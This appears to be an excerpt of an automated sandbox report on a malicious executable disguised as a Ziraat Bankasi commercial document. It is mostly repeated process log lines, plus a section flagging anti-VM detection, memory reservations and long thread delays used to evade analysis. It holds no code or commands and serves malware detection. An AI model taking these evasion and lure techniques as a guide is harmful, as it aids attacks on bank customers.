          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Yara detected AntiVM3
          Source: Yara matchFile source: Process Memory Space: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe PID: 6640, type: MEMORYSTR
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeMemory allocated: FC0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeMemory allocated: 2860000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeMemory allocated: 2640000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeMemory allocated: 79D0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeMemory allocated: 89D0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeMemory allocated: 8B90000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeMemory allocated: 9B90000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeMemory allocated: 18F0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeMemory allocated: 3160000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeMemory allocated: 2F80000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 599875Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 599765Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 599656Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 599547Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 599437Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 599328Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 599218Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 599109Jump to behavior
